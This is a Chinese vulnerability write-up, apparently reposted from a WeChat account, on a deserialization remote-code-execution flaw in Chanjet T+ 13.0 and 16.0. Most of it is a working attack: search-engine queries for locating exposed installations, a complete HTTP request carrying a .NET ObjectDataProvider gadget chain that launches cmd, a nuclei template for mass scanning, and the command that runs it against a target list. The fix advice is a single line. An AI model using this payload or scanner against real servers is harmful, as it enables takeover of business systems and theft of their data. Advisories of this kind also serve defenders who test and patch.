免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
02
—
漏洞影响
畅捷通 T+ 13.0
畅捷通 T+ 16.0
03
—
漏洞描述
T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在反序列化RCE漏洞,会导致主机沦陷。
04
—
fofa-query: app="畅捷通-TPlus"hunter-query: app.name="畅捷通 T+"
05
—
漏洞复现
可以利用dnslog来复现,向靶场发送如下数据包,其中ping 6qevyvmi.dnslog.pw是dnslog payload
POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Content-Type: application/json{"storeID":{"__type":"System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName":"Start","ObjectInstance":{"__type":"System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo": {"__type":"System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","FileName":"cmd", "Arguments":"/c ping 6qevyvmi.dnslog.pw"}}}}
漏洞复现成功
06
—
批量漏洞扫描poc
nuclei poc文件内容如下
id: yonyou-chanjet-tplus-rratablecontroller-rceinfo:name: 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞author: fgzseverity: criticaldescription: |T+是用友畅捷通推出的一款新型互联网企业管理系统,T+能够满足成长型小微企业对其灵活业务流程的管控需求,重点解决往来业务管理、订单跟踪、资金、库存等管理难题。用户可以通过各种固定或移动设备随时随地迅速获取企业实时、动态的运营信息。该系统/tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx接口存在反序列化RCE漏洞,会导致主机沦陷。reference:Nonemetadata:verified: truemax-request: 1fofa-query: app="畅捷通-TPlus"hunter-query: app.name="畅捷通 T+"tags: chanjet,rcehttp:- raw:- |POST /tplus/ajaxpro/Ufida.T.DI.UIP.RRA.RRATableController,Ufida.T.DI.UIP.ashx?method=GetStoreWarehouseByStore HTTP/1.1Host: {{Hostname}}User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36Connection: closeContent-Type: application/json{"storeID": {"__type": "System.Windows.Data.ObjectDataProvider, PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","MethodName": "Start","ObjectInstance": {"__type": "System.Diagnostics.Process, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","StartInfo": {"__type": "System.Diagnostics.ProcessStartInfo, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","FileName": "cmd","Arguments": "/c ping {{interactsh-url}}"}}}}matchers:- type: wordpart: interactsh_protocolwords:- "dns"
运行POC
nuclei.exe -t mypoc/用友/畅捷通T+/yonyou-chanjet-tplus-rratablecontroller-rce.yaml -l data/TPlus.txt
07
—
修复建议
查看官方补丁进行升级。
08
—
新粉丝
原文始发于微信公众号(AI与网安):畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE漏洞
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论